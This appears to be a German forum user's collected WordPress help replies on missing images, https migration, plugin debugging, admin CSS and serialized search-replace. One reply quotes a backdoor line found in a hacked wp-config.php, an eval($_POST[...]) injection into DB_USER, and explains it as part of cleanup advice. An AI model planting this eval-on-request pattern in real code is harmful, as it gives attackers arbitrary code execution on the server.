Beiträge von b3317133

    Entweder Du machst selbst exakt das im o.g. Link beschriebene "weitere Vorgehen" oder Du lässt einen Fachmann ran, der das für Dich macht, poste eine entspr. Anfrage in der Jobbörse im Forum, dann bekommst Du sicher Angebote.

    Ein (oder auch mehrere) klassische(r) Trojaner bzw. Backdoor.

    Die zu klärende Frage ist, wie bzw. wodurch wird diese Datei generiert und wie erfolgen die Anpassungen in [FONT=Courier New]wp-config.php[/FONT]

    Die Zeile mit [FONT=Courier New]define('DB_USER', 'c[COLOR=#ff0000]');eval($_POST['earvsqqsv']);//[/COLOR]');[/FONT] deutet auf eine Injection-Möglichkeit bei der Eingabe des Datenbankbenutzers hin, der rot markierte Bereich gehört da nicht hin und ermöglicht dann in der Folge das Ausführen von beliebigem externen PHP-Code.

    Der ganze Server ist als kompromitiert zu betrachten.

    Das Wichtigste wäre das Feststellen und Beseitigen der Sicherheitslücke, sonst passiert das immer wieder.

    Das allgemeine Vorgehen bei einem Hack ist z.B. hier beschrieben.

    Alternativ wende Dich an die Person, die den Website eingerichtet hat oder suche jemanden für eine Ursachensuche und Bereinigung z.B. über die Jobbörse hier im Forum.

    Herausgefunden nach knapp 10 Minuten durch die Browser-Konsole und etwas Erfahrung mit gängigen WordPress- und anderen CMS- oder Server-Problemen...

    ..beim nächsten Mal einfach den Link posten, wenn man danach gefragt wird, dann geht vieles viel schneller.

    Verlinkte Bilder wie [plain]/wp-content/uploads/5.png[/plain] usw. existieren einfach nicht auf dem Server.

    Wurden Ordner verschoben oder sonstige Änderungen gemacht?

    Dass Du die Bilder in manchen Browsern (noch) sehen kannst, mag am jeweiligen Browser-Cache liegen.

    Dazu ist ein Teil des Websites, z.B. der Adminbereich, offenbar für https eingerichtet, das Frontend aber nicht. Wie wurde das gemacht? Über Plugins? Falls ja, deaktiviere mal alle diesbzgl. Plugins.

    Nach einem weiteren Test wird jetzt eine "1&1 Under Construction" Seite gezeigt, offenbar läuft da einiges schief. Ggf. erstmal mit dem Weiterbasteln abwarten, bis Du Deine Fragen hier klären kannst, sonst machen Hilfeversuche hier relativ wenig Sinn.

    Wenn man dem oben verlinkten allgemeinen Vorgehen bei einem Hack folgt, gibt es danach keine "Schadcodes" mehr im gesamten System.

    Mit dem Deaktivieren oder Entfernen eines Plugins alleine wäre es natürlich nicht getan.

    Die Ergänzung des Links kommt möglicherweise durch das Spendenformular von Altruja, entferne das temporär oder wende Dich an die Person, die das Formular eingerichtet hat. Der Link befindet sich in einer Datei [plain]altruja.de/i/wzun[/plain]

    Weiterhin läuft ein Pagespeed Plugin o.ä., deaktiviere auch das mal. Das erleichert das Nachvollziehen, was wann wo wie auf der Seite passiert.

    @Raphael Der Teil "Überschrift mit dem Datum vor den Beiträgen des jeweiligen Tages" fehlte beim alten Jobbörse Aufruf. Hatte den Job damals erledigt und die aktuelle Anforderung im dafür erstellten Plugin jetzt über eine [FONT=Courier New]get_template_part_content-standard[/FONT] Action mit entspr. Logik ergänzt, [FONT=Courier New]get_template_part('content-standard')[/FONT] wird im genutzten Theme Hueman u.a. für die Blogansicht verwendet, ein Child-Theme gibt es derzeit nicht.

    Du solltest die Kategorienbox nach links auf die andere Seite unter den Editor ziehen können, dann wäre sie breiter. Die Höhe (Standard maximal 200px) könnte man in einem eigenen Plugin oder in der [FONT=Courier New]functions.php[/FONT] des Child-Themes o.ä. über eine [FONT=Courier New]admin_head[/FONT] Action überschreiben, ggf. ähnlich auch die Abstände zwischen den Kategorien oder die Textgrösse o.ä.

    Code
    function my_custom_admin_head() {
        echo '<style>#product_catdiv .categorydiv div.tabs-panel { max-height: 600px; }</style>';
    }
    add_action( 'admin_head', 'my_custom_admin_head' );

    Für das Ersetzen von http auf https sollte man besser ein Plugin wie "Better Search Replace" nutzen, da diese bei serialisiert gespeicherten Daten z.B. in wp_options o.ä. die entspr. Feldlänge korrigieren, das fällt bei Anpassungen mit Texteditor o.ä. in der Regel unter den Tisch.

    Code
    Original:
    a:1:{s:3:"url";s:18:"http://example.com";}
    
    
    Ersetzt mit Texteditor (die 18 ist falsch):
    a:1:{s:3:"url";s:18:"https://example.com";}
    
    
    Ersetzt mit Better Search Replace o.ä.:
    a:1:{s:3:"url";s:19:"https://example.com";}

    Da es leider keinen Link zu Seite gibt, wo man das nachvollziehen könnte, kann man leider nur schwer weiterhelfen.

    Deaktiviere der Reihe nach alle Plugins, leere jeweils dazwischen Deinen Browser Cache, nutze ein "Twenty XXX" Standard-Theme, bis Du die Ursache weiter eingegrenzt hast.

    Inwiefern würde das Layout negativ beeinflusst werden?

    Probiere es einfach aus, Elementor ist ein eigener Editor, selbstgestricktes HTML ist dort nur innerhalb entspr. Elemente vorgesehen, eine komplette Bearbeitung nicht.

    Evtl. hilf auch der Elementor Support, den Du mit "Pro" mitgekauft haben solltest, mit einer detaillierteren technischen Erklärung weiter.

    Um herauszufinden, warum das Laden einer Seite zwei Minuten dauert, würde man z.B. mal in die Browser Konsole schauen, oder in Server Error Logs o.ä., das kann man von aussen schwer beurteilen. Hatte hier noch keine solch langsame Seite, mit weitaus weniger "starker" Anbindung.